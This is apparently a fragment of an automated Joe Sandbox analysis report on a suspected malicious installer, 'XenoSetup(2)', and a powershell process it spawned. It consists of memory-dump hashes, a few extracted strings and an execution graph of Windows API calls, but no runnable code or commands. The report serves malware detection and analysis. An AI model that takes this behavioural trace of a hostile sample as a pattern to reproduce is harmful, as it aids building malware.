                                                                                      • Snapshot File: hcaresult_0_2_7ffd348b0000_XenoSetup(2).jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 173a97a724d681238d49c7f53373da5c9f836b7e058d94eb6dd2776fca570c89
                                                                                      • Instruction ID: 89b58bb970ded9c5046fcb0657775a296f2353b3fdd18c389b680c0243aba5a8
                                                                                      • Opcode Fuzzy Hash: 173a97a724d681238d49c7f53373da5c9f836b7e058d94eb6dd2776fca570c89
                                                                                      • Instruction Fuzzy Hash: D1A13921B1CA494FE798EB6C44A93B97BD2FFA9350F4801B9D44EC72D3DD78A8419381
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2354819212.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd348b0000_XenoSetup(2).jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f679492da070416feb87b952c6babedc9d65a048b59f7b49e452e64b37c3134e
                                                                                      • Instruction ID: fa807d4f73bee206360bf72126ab000d27268db05a8daac6f247c3c2fff77bed
                                                                                      • Opcode Fuzzy Hash: f679492da070416feb87b952c6babedc9d65a048b59f7b49e452e64b37c3134e
                                                                                      • Instruction Fuzzy Hash: D4219F35B289594FDBA9EBB884616F9B3D5FF95300F0445BAD00EC3297DE28A9058790
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2354819212.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd348b0000_XenoSetup(2).jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b26d7e67486bbcc20d6fb2ad2be991668955394775d2a1461bde6ee25afa49b1
                                                                                      • Instruction ID: 02442eca4098a0143e227c712d267806b4dfac0623a6f5d21bab5c765537d6d9
                                                                                      • Opcode Fuzzy Hash: b26d7e67486bbcc20d6fb2ad2be991668955394775d2a1461bde6ee25afa49b1
                                                                                      • Instruction Fuzzy Hash: 6821D631B19A5C4FD7A5BB7884A52E977A1FF8A305F4001BAD10EC7293DE2D9C418381
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2354819212.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd348b0000_XenoSetup(2).jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 67f99472494a777c70c371d679773b8b8a65489d275d52a92a8705608bca6b4b
                                                                                      • Instruction ID: 2b23f94b69703fc1e705885b3195948273e0f44e3041d083cbad522d81c663c5
                                                                                      • Opcode Fuzzy Hash: 67f99472494a777c70c371d679773b8b8a65489d275d52a92a8705608bca6b4b
                                                                                      • Instruction Fuzzy Hash: 5B113612F4D9850FE7A4A3B828A61F57BC5DB96321B0501B6D44DC72D3DC0D68478391
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2354819212.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd348b0000_XenoSetup(2).jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: aee3051780b0a9e4f233a67e63dc0afdd7f1363a79cc6cc727199cf39649b8d5
                                                                                      • Instruction ID: fcea0b6734a264eb2c40d64a12b72659af36684eaedf96445dfd19ca423f907e
                                                                                      • Opcode Fuzzy Hash: aee3051780b0a9e4f233a67e63dc0afdd7f1363a79cc6cc727199cf39649b8d5
                                                                                      • Instruction Fuzzy Hash: 17F0A412F198090BE7A4A6AD18A92B557C6EBA9361B40017AE50EC2296DC5D58429390
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2354819212.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd348b0000_XenoSetup(2).jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2fc6e1db4e1bfa1ff20755b7efe1387f65069bd318d49263f9cb79c06232fe99
                                                                                      • Instruction ID: 7fd0cf97019e37f915d97d074dbfb98d175d5415352a33a88a4d821e60759a27
                                                                                      • Opcode Fuzzy Hash: 2fc6e1db4e1bfa1ff20755b7efe1387f65069bd318d49263f9cb79c06232fe99
                                                                                      • Instruction Fuzzy Hash: 1AE0CD10718D1547D798F66C5461DB973D1DB84354B480034F40CD7285CD2CAA8143C1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2330877459.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_7ffd34890000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5a73a70e9ad4ef561402dc41440588857c2f5ca3bd2e72da25838d2b399a5dea
                                                                                      • Instruction ID: 048e4b2a9806ea3e9f26c4b137e9f401c83007ee583abc5228aef1f7d964995b
                                                                                      • Opcode Fuzzy Hash: 5a73a70e9ad4ef561402dc41440588857c2f5ca3bd2e72da25838d2b399a5dea
                                                                                      • Instruction Fuzzy Hash: C1710C67B0CE965BE711A76C9CB60DA7FE0EF13328B0D01B2C698CB053ED1D24179686
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2330877459.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_7ffd34890000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2d64f1e2318e4a679313b1ed38844097b2692f5a9bfe5dd18b729018ef9b5f97
                                                                                      • Instruction ID: 469dd1610623d55de20e2c97b090520eb55472bbade319efa11ea0041850aa7d
                                                                                      • Opcode Fuzzy Hash: 2d64f1e2318e4a679313b1ed38844097b2692f5a9bfe5dd18b729018ef9b5f97
                                                                                      • Instruction Fuzzy Hash: 26D17031A18A4D8FDF95DF5CC4A5AE97BE1FF69300F14416AD40DE72A6CA34E881CB81
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2335383940.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_7ffd34960000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c59e708ad63793eea274f61f0fda813f0c4e3f65c25b6a084af1e8f7d7ce6294
                                                                                      • Instruction ID: ad84f9a8dc5a6dfc2cf9cba346ce0651eff39311b3cfc6192771d81e3ac6fd3c
                                                                                      • Opcode Fuzzy Hash: c59e708ad63793eea274f61f0fda813f0c4e3f65c25b6a084af1e8f7d7ce6294
                                                                                      • Instruction Fuzzy Hash: 57515432B0CA968FEBA99A9C44B057437D2EFA2230B1900BFC24DC7197DE2CEC058755
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2335383940.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_7ffd34960000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 834160aea9c8c3c0a7dd77e213251ec3e8ac2b16c18a3eab6627b7ec221124ad
                                                                                      • Instruction ID: 7611f9c545e6c7b8af415edfc30230694942b1242ee081149931d278c65b892f
                                                                                      • Opcode Fuzzy Hash: 834160aea9c8c3c0a7dd77e213251ec3e8ac2b16c18a3eab6627b7ec221124ad
                                                                                      • Instruction Fuzzy Hash: BA412632B0DA898FEBA9D6AC54A19B477D1EF46234B0800BFD54DC7197E91CBC048395
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2327267738.00007FFD3477D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3477D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_7ffd3477d000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8c1b19f8518caa2ef92761a7d3ee81f8b51d10569fae5ef97887e9568eafd016
                                                                                      • Instruction ID: 4dad2e9feca7764a5457194dc3a786c5beee2842d9754c0d39ecdfcbe0358b83
                                                                                      • Opcode Fuzzy Hash: 8c1b19f8518caa2ef92761a7d3ee81f8b51d10569fae5ef97887e9568eafd016
                                                                                      • Instruction Fuzzy Hash: 364126B180DBC48FE7568B289C959623FF0EF53320B1945DFD088CB0A3D629B845C7A2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2330877459.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_7ffd34890000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 55385a3b6207283d6551fde58d512b3eb2e05f22598bf40dc6ee2216964d976f
                                                                                      • Instruction ID: 026804f15fa3227bcde5e230b5dea7e81a1204c719c63fc3374ecb092a58a51e
                                                                                      • Opcode Fuzzy Hash: 55385a3b6207283d6551fde58d512b3eb2e05f22598bf40dc6ee2216964d976f
                                                                                      • Instruction Fuzzy Hash: 8F31873191CF4C9FDB58DF5C98466A97BE0FB99311F00422FE449D3251DB71A8558BC2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2330877459.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_7ffd34890000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 936e6af6203c4933bf03ac22c2757c492f92679a07c5f6f919c951c4318521a4
                                                                                      • Instruction ID: d817b5bed3aca4205ce7cb934a3af39acf6b2aa796c37093728c166f0c9a8b75
                                                                                      • Opcode Fuzzy Hash: 936e6af6203c4933bf03ac22c2757c492f92679a07c5f6f919c951c4318521a4
                                                                                      • Instruction Fuzzy Hash: 90210A3190CB4C4FDB59DFAC988A7E97FF0EB96321F04416BD448C3152DA74A41ACB91
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2335383940.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_7ffd34960000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a3c53c7db6b4af904c31e86cda3a9aa5e1aa079894e44920b17342084db76503
                                                                                      • Instruction ID: 3a952a61cf3550ae62acea75ba87e3380824cc1cce7ad291c3f898959666b998
                                                                                      • Opcode Fuzzy Hash: a3c53c7db6b4af904c31e86cda3a9aa5e1aa079894e44920b17342084db76503
                                                                                      • Instruction Fuzzy Hash: AF21F732B0DA968FE7A5DB9C44B057466C2EF62234B4A00BED14DC71A7CD2CEC049719
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2335383940.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_7ffd34960000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c63313a925358de9643e322fedf074a5058cc00f5bdaea381c6fb67b4667dd42
                                                                                      • Instruction ID: f2bd8e02b3ba02cdaa3327900867d1528ed8b03a28f96eb2f95ede5648238578
                                                                                      • Opcode Fuzzy Hash: c63313a925358de9643e322fedf074a5058cc00f5bdaea381c6fb67b4667dd42
                                                                                      • Instruction Fuzzy Hash: 1211E032A0E5858FEBA5D79C94B59B87BD1EF0223474800FED55DCB09ACA1DBC049365
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2335383940.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_7ffd34960000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a05b7a00fc2021c5696182fc72d81821fc379f4df11dcfbdbb86aa69ffac685b
                                                                                      • Instruction ID: 0de7bee3e9bacdfffbef96bdcb6dcabfe16ab017922f029d77c6db9690b12ca3
                                                                                      • Opcode Fuzzy Hash: a05b7a00fc2021c5696182fc72d81821fc379f4df11dcfbdbb86aa69ffac685b
                                                                                      • Instruction Fuzzy Hash: 1B11E372B0DA888FEB95DAA890E41A87B91EF56220B0440BEC54CD7097DA2DAC45C360
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2330877459.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_7ffd34890000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                      • Instruction ID: ae605e7e7b896741c28386b595f310dc01aebb4b8afea9650844b96dbb4c98a5
                                                                                      • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                      • Instruction Fuzzy Hash: A401A73020CB0C4FD744EF0CE451AA6B7E0FB89320F10052DE58AC3651DA36E882CB41
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2330877459.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_7ffd34890000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: N_^4$N_^7$N_^F$N_^J
                                                                                      • API String ID: 0-3508309026
                                                                                      • Opcode ID: 2f5b78e997f032b4b8a1963d1e0a1c1ccde872ad4d7bd0ddebff894856409483
                                                                                      • Instruction ID: 3b76da1c841fbdb11da6a3614379ab6690a2d8885d252c0cc13f4bf58231014a
                                                                                      • Opcode Fuzzy Hash: 2f5b78e997f032b4b8a1963d1e0a1c1ccde872ad4d7bd0ddebff894856409483
                                                                                      • Instruction Fuzzy Hash: D32101B7B084266FD3127BFCAD346DA3B54DB9433474902B2D298DB143E934708A8AC2

                                                                                      Execution Graph

                                                                                      Execution Coverage:9.6%
                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                      Signature Coverage:5.1%
                                                                                      Total number of Nodes:1515
                                                                                      Total number of Limit Nodes:30
                                                                                      execution_graph 25397 1002900 6 API calls 4 library calls 25399 100a700 21 API calls 25447 1006000 QueryPerformanceFrequency QueryPerformanceCounter 25449 100f200 51 API calls 25401 fe5ef0 82 API calls 25450 fe95f0 80 API calls 25451 fffd4f 9 API calls 2 library calls 25455 fef1e8 FreeLibrary 23552 ffeae7 23553 ffeaf1 23552->23553 23554 ffe85d ___delayLoadHelper2@8 14 API calls 23553->23554 23555 ffeafe 23554->23555 25402 fff4e7 29 API calls _abort 23557 ffb7e0 23558 ffb7ea __EH_prolog 23557->23558 23725 fe1316 23558->23725 23561 ffbf0f 23804 ffd69e 23561->23804 23562 ffb82a 23564 ffb89b 23562->23564 23565 ffb838 23562->23565 23638 ffb841 23562->23638 23567 ffb92e GetDlgItemTextW 23564->23567 23573 ffb8b1 23564->23573 23568 ffb83c 23565->23568 23569 ffb878 23565->23569 23567->23569 23572 ffb96b 23567->23572 23580 fee617 53 API calls 23568->23580 23568->23638 23577 ffb95f KiUserCallbackDispatcher 23569->23577 23569->23638 23570 ffbf2a SendMessageW 23571 ffbf38 23570->23571 23574 ffbf52 GetDlgItem SendMessageW 23571->23574 23575 ffbf41 SendDlgItemMessageW 23571->23575 23578 ffb980 GetDlgItem 23572->23578 23723 ffb974 23572->23723 23579 fee617 53 API calls 23573->23579 23822 ffa64d GetCurrentDirectoryW 23574->23822 23575->23574 23577->23638 23582 ffb9b7 SetFocus 23578->23582 23583 ffb994 SendMessageW SendMessageW 23578->23583 23584 ffb8ce SetDlgItemTextW 23579->23584 23585 ffb85b 23580->23585 23581 ffbf82 GetDlgItem 23586 ffbf9f 23581->23586 23587 ffbfa5 SetWindowTextW 23581->23587 23588 ffb9c7 23582->23588 23598 ffb9e0 23582->23598 23583->23582 23589 ffb8d9 23584->23589 23844 fe124f SHGetMalloc 23585->23844 23586->23587 23823 ffabab GetClassNameW 23587->23823 23593 fee617 53 API calls 23588->23593 23596 ffb8e6 GetMessageW 23589->23596 23589->23638 23591 ffbe55 23594 fee617 53 API calls 23591->23594 23597 ffb9d1 23593->23597 23600 ffbe65 SetDlgItemTextW 23594->23600 23602 ffb8fd IsDialogMessageW 23596->23602 23596->23638 23845 ffd4d4 23597->23845 23607 fee617 53 API calls 23598->23607 23599 ffc1fc SetDlgItemTextW 23599->23638 23604 ffbe79 23600->23604 23602->23589 23606 ffb90c TranslateMessage DispatchMessageW 23602->23606 23609 fee617 53 API calls 23604->23609 23606->23589 23608 ffba17 23607->23608 23611 fe4092 _swprintf 51 API calls 23608->23611 23645 ffbe9c _wcslen 23609->23645 23610 ffbff0 23614 ffc020 23610->23614 23617 fee617 53 API calls 23610->23617 23616 ffba29 23611->23616 23612 ffc73f 97 API calls 23612->23610 23613 ffb9d9 23735 fea0b1 23613->23735 23619 ffc73f 97 API calls 23614->23619 23663 ffc0d8 23614->23663 23621 ffd4d4 16 API calls 23616->23621 23622 ffc003 SetDlgItemTextW 23617->23622 23627 ffc03b 23619->23627 23620 ffc18b 23628 ffc19d 23620->23628 23629 ffc194 EnableWindow 23620->23629 23621->23613 23625 fee617 53 API calls 23622->23625 23623 ffba73 23741 ffac04 SetCurrentDirectoryW 23623->23741 23624 ffba68 GetLastError 23624->23623 23631 ffc017 SetDlgItemTextW 23625->23631 23639 ffc04d 23627->23639 23667 ffc072 23627->23667 23634 ffc1ba 23628->23634 23863 fe12d3 GetDlgItem EnableWindow 23628->23863 23629->23628 23630 ffbeed 23633 fee617 53 API calls 23630->23633 23631->23614 23632 ffba87 23636 ffba9e 23632->23636 23637 ffba90 GetLastError 23632->23637 23633->23638 23635 ffc1e1 23634->23635 23651 ffc1d9 SendMessageW 23634->23651 23635->23638 23652 fee617 53 API calls 23635->23652 23648 ffbb20 23636->23648 23653 ffbaae GetTickCount 23636->23653 23697 ffbb11 23636->23697 23637->23636 23861 ff9ed5 32 API calls 23639->23861 23640 ffc0cb 23642 ffc73f 97 API calls 23640->23642 23642->23663 23644 ffc1b0 23864 fe12d3 GetDlgItem EnableWindow 23644->23864 23645->23630 23646 fee617 53 API calls 23645->23646 23654 ffbed0 23646->23654 23647 ffbd56 23760 fe12f1 GetDlgItem ShowWindow 23647->23760 23655 ffbcfb 23648->23655 23657 ffbb39 GetModuleFileNameW 23648->23657 23658 ffbcf1 23648->23658 23649 ffc066 23649->23667 23651->23635 23660 ffb862 23652->23660 23742 fe4092 23653->23742 23662 fe4092 _swprintf 51 API calls 23654->23662 23666 fee617 53 API calls 23655->23666 23656 ffc169 23862 ff9ed5 32 API calls 23656->23862 23855 fef28c 82 API calls 23657->23855 23658->23569 23658->23655 23660->23599 23660->23638 23662->23630 23663->23620 23663->23656 23670 fee617 53 API calls 23663->23670 23673 ffbd05 23666->23673 23667->23640 23674 ffc73f 97 API calls 23667->23674 23668 ffbd66 23761 fe12f1 GetDlgItem ShowWindow 23668->23761 23669 ffbac7 23745 fe966e 23669->23745 23670->23663 23671 ffc188 23671->23620 23672 ffbb5f 23676 fe4092 _swprintf 51 API calls 23672->23676 23677 fe4092 _swprintf 51 API calls 23673->23677 23678 ffc0a0 23674->23678 23680 ffbb81 CreateFileMappingW 23676->23680 23681 ffbd23 23677->23681 23678->23640 23682 ffc0a9 DialogBoxParamW 23678->23682 23679 ffbd70 23762 fee617 23679->23762 23685 ffbbe3 GetCommandLineW 23680->23685 23719 ffbc60 __InternalCxxFrameHandler 23680->23719 23695 fee617 53 API calls 23681->23695 23682->23569 23682->23640 23690 ffbbf4 23685->23690 23687 ffbaed 23688 ffbaf4 GetLastError 23687->23688 23689 ffbaff 23687->23689 23688->23689 23753 fe959a 23689->23753 23856 ffb425 SHGetMalloc 23690->23856 23691 ffbc6b ShellExecuteExW 23714 ffbc88 23691->23714 23699 ffbd3d 23695->23699 23696 ffbd8c SetDlgItemTextW GetDlgItem 23700 ffbda9 GetWindowLongW SetWindowLongW 23696->23700 23701 ffbdc1 23696->23701 23697->23647 23697->23648 23698 ffbc10 23857 ffb425 SHGetMalloc 23698->23857 23700->23701 23767 ffc73f 23701->23767 23705 ffbc1c 23858 ffb425 SHGetMalloc 23705->23858 23706 ffbccb 23706->23658 23712 ffbce1 UnmapViewOfFile CloseHandle 23706->23712 23707 ffc73f 97 API calls 23709 ffbddd 23707->23709 23792 ffda52 23709->23792 23710 ffbc28 23859 fef3fa 82 API calls 2 library calls 23710->23859 23712->23658 23714->23706 23717 ffbcb7 Sleep 23714->23717 23716 ffbc3f MapViewOfFile 23716->23719 23717->23706 23717->23714 23718 ffc73f 97 API calls 23722 ffbe03 23718->23722 23719->23691 23720 ffbe2c 23860 fe12d3 GetDlgItem EnableWindow 23720->23860 23722->23720 23724 ffc73f 97 API calls 23722->23724 23723->23569 23723->23591 23724->23720 23726 fe131f 23725->23726 23727 fe1378 23725->23727 23729 fe1385 23726->23729 23865 fee2e8 62 API calls 2 library calls 23726->23865 23866 fee2c1 GetWindowLongW SetWindowLongW 23727->23866 23729->23561 23729->23562 23729->23638 23731 fe1341 23731->23729 23732 fe1354 GetDlgItem 23731->23732 23732->23729 23733 fe1364 23732->23733 23733->23729 23734 fe136a SetWindowTextW 23733->23734 23734->23729 23738 fea0bb 23735->23738 23736 fea14c 23737 fea2b2 8 API calls 23736->23737 23739 fea175 23736->23739 23737->23739 23738->23736 23738->23739 23867 fea2b2 23738->23867 23739->23623 23739->23624 23741->23632 23905 fe4065 23742->23905 23746 fe9678 23745->23746 23747 fe96d5 CreateFileW 23746->23747 23748 fe96c9 23746->23748 23747->23748 23749 fe971f 23748->23749 23750 febb03 GetCurrentDirectoryW 23748->23750 23749->23687 23751 fe9704 23750->23751 23751->23749 23752 fe9708 CreateFileW 23751->23752 23752->23749 23754 fe95be 23753->23754 23755 fe95cf 23753->23755 23754->23755 23756 fe95ca 23754->23756 23757 fe95d1 23754->23757 23755->23697 23992 fe974e 23756->23992 23997 fe9620 23757->23997 23760->23668 23761->23679 23763 fee627 23762->23763 24012 fee648 23763->24012 23766 fe12f1 GetDlgItem ShowWindow 23766->23696 23768 ffc749 __EH_prolog 23767->23768 23769 ffbdcf 23768->23769 24035 ffb314 23768->24035 23769->23707 23772 ffb314 ExpandEnvironmentStringsW 23778 ffc780 _wcslen _wcsrchr 23772->23778 23773 ffca67 SetWindowTextW 23773->23778 23778->23769 23778->23772 23778->23773 23779 ffc855 SetFileAttributesW 23778->23779 23784 ffcc31 GetDlgItem SetWindowTextW SendMessageW 23778->23784 23787 ffcc71 SendMessageW 23778->23787 24039 ff1fbb CompareStringW 23778->24039 24040 ffa64d GetCurrentDirectoryW 23778->24040 24042 fea5d1 6 API calls 23778->24042 24043 fea55a FindClose 23778->24043 24044 ffb48e 76 API calls 2 library calls 23778->24044 24045 1003e3e 23778->24045 23781 ffc90f GetFileAttributesW 23779->23781 23791 ffc86f _abort _wcslen 23779->23791 23781->23778 23783 ffc921 DeleteFileW 23781->23783 23783->23778 23785 ffc932 23783->23785 23784->23778 23786 fe4092 _swprintf 51 API calls 23785->23786 23788 ffc952 GetFileAttributesW 23786->23788 23787->23778 23788->23785 23789 ffc967 MoveFileW 23788->23789 23789->23778 23790 ffc97f MoveFileExW 23789->23790 23790->23778 23791->23778 23791->23781 24041 feb991 51 API calls 2 library calls 23791->24041 23793 ffda5c __EH_prolog 23792->23793 24069 ff0659 23793->24069 23795 ffda8d 24073 fe5b3d 23795->24073 23797 ffdaab 24077 fe7b0d 23797->24077 23801 ffdafe 24093 fe7b9e 23801->24093 23803 ffbdee 23803->23718 23805 ffd6a8 23804->23805 24582 ffa5c6 23805->24582 23808 ffbf15 23808->23570 23808->23571 23809 ffd6b5 GetWindow 23809->23808 23810 ffd6d5 23809->23810 23810->23808 23811 ffd6e2 GetClassNameW 23810->23811 23813 ffd76a GetWindow 23810->23813 23814 ffd706 GetWindowLongW 23810->23814 24587 ff1fbb CompareStringW 23811->24587 23813->23808 23813->23810 23814->23813 23815 ffd716 SendMessageW 23814->23815 23815->23813 23816 ffd72c GetObjectW 23815->23816 24588 ffa605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23816->24588 23818 ffd743 24589 ffa5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23818->24589 24590 ffa80c 8 API calls 23818->24590 23821 ffd754 SendMessageW DeleteObject 23821->23813 23822->23581 23824 ffabcc 23823->23824 23825 ffabf1 23823->23825 24593 ff1fbb CompareStringW 23824->24593 23827 ffabff 23825->23827 23828 ffabf6 SHAutoComplete 23825->23828 23831 ffb093 23827->23831 23828->23827 23829 ffabdf 23829->23825 23830 ffabe3 FindWindowExW 23829->23830 23830->23825 23832 ffb09d __EH_prolog 23831->23832 23833 fe13dc 84 API calls 23832->23833 23834 ffb0bf 23833->23834 24594 fe1fdc 23834->24594 23837 ffb0eb 23840 fe19af 128 API calls 23837->23840 23838 ffb0d9 23839 fe1692 86 API calls 23838->23839 23841 ffb0e4 23839->23841 23843 ffb10d __InternalCxxFrameHandler ___std_exception_copy 23840->23843 23841->23610 23841->23612 23842 fe1692 86 API calls 23842->23841 23843->23842 23844->23660 24602 ffb568 PeekMessageW 23845->24602 23848 ffd536 SendMessageW SendMessageW 23850 ffd572 23848->23850 23851 ffd591 SendMessageW SendMessageW SendMessageW 23848->23851 23849 ffd502 23852 ffd50d ShowWindow SendMessageW SendMessageW 23849->23852 23850->23851 23853 ffd5e7 SendMessageW 23851->23853 23854 ffd5c4 SendMessageW 23851->23854 23852->23848 23853->23613 23854->23853 23855->23672 23856->23698 23857->23705 23858->23710 23859->23716 23860->23723 23861->23649 23862->23671 23863->23644 23864->23634 23865->23731 23866->23729 23868 fea2bf 23867->23868 23869 fea2e3 23868->23869 23870 fea2d6 CreateDirectoryW 23868->23870 23888 fea231 23869->23888 23870->23869 23873 fea316 23870->23873 23874 fea325 23873->23874 23880 fea4ed 23873->23880 23874->23738 23875 fea329 GetLastError 23875->23874 23878 fea2ff 23878->23875 23879 fea303 CreateDirectoryW 23878->23879 23879->23873 23879->23875 23895 ffec50 23880->23895 23883 fea53d 23883->23874 23884 fea510 23885 febb03 GetCurrentDirectoryW 23884->23885 23886 fea524 23885->23886 23886->23883 23887 fea528 SetFileAttributesW 23886->23887 23887->23883 23897 fea243 23888->23897 23891 febb03 23892 febb10 _wcslen 23891->23892 23893 febbb8 GetCurrentDirectoryW 23892->23893 23894 febb39 _wcslen 23892->23894 23893->23894 23894->23878 23896 fea4fa SetFileAttributesW 23895->23896 23896->23883 23896->23884 23898 ffec50 23897->23898 23899 fea250 GetFileAttributesW 23898->23899 23900 fea23a 23899->23900 23901 fea261 23899->23901 23900->23875 23900->23891 23902 febb03 GetCurrentDirectoryW 23901->23902 23903 fea275 23902->23903 23903->23900 23904 fea279 GetFileAttributesW 23903->23904 23904->23900 23906 fe407c __vswprintf_c_l 23905->23906 23909 1005fd4 23906->23909 23912 1004097 23909->23912 23913 10040d7 23912->23913 23914 10040bf 23912->23914 23913->23914 23916 10040df 23913->23916 23936 10091a8 20 API calls __dosmaperr 23914->23936 23938 1004636 23916->23938 23918 10040c4 23937 1009087 26 API calls _abort 23918->23937 23923 1004167 23947 10049e6 51 API calls 4 library calls 23923->23947 23924 fe4086 23924->23669 23926 1004172 23948 10046b9 20 API calls _free 23926->23948 23928 10040cf 23929 fffbbc 23928->23929 23930 fffbc5 IsProcessorFeaturePresent 23929->23930 23931 fffbc4 23929->23931 23933 fffc07 23930->23933 23931->23924 23949 fffbca SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess 